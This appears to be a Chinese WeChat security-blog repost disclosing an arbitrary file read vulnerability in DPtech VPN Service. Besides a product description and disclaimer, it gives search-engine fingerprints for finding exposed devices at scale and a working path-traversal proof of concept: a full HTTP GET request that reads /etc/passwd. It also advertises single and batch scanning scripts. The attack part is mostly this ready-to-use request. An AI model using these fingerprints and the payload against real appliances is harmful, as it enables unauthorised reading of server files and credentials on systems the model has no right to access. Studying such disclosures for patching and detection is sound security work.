# 拒绝知识星球付费POC
关注本公众号,长期更新红蓝对抗(工具,漏洞等。。)
免责声明:
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
漏洞描述
DPtech VPN是迪普科技面向广域互联应用场景推出的专业安全网关产品,集成了IPSec、SSL、L2TP、GRE等多种VPN技术,支持国密算法,实现分支机构、移动办公人员的统一安全接入,提供内部业务跨互联网的安全访问;支持基于用户、应用的安全策略,同时提供攻击防护、用户认证、行为审计、带宽管理、链路负载均衡等多种安全功能,可作为总部及分支机构的安全出口;除此以外,实现了集中管理、统一配置,并集成AC和PoE功能,支持3G/4G无线模块扩展,可有效的简化用户组网,降低运维成本。
杭州迪普科技股份有限公司DPTech VPN Service 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。
关键字
fofa:app="DPtech-SSLVPN",cert="DPtechCa"
hunter:cert="DPtechCa"
360quanke:cert:"DPtechCa"
漏洞复现
poc: /../../../../../../../etc/passwd
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host:Connection: keep-alivesec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
![迪普VPN Service 接口存在任意文件读取漏洞[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/1-1700274902.png "迪普VPN Service 接口存在任意文件读取漏洞[附POC]")
检测poc
单个检测:
![迪普VPN Service 接口存在任意文件读取漏洞[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/2-1700274903.png "迪普VPN Service 接口存在任意文件读取漏洞[附POC]")
批量检测:
![迪普VPN Service 接口存在任意文件读取漏洞[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/2-1700274904.png "迪普VPN Service 接口存在任意文件读取漏洞[附POC]")
脚本获取方式:
关注本公众号,回复“1009”
原文始发于微信公众号(知攻善防实验室):迪普VPN Service 接口存在任意文件读取漏洞[附POC]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论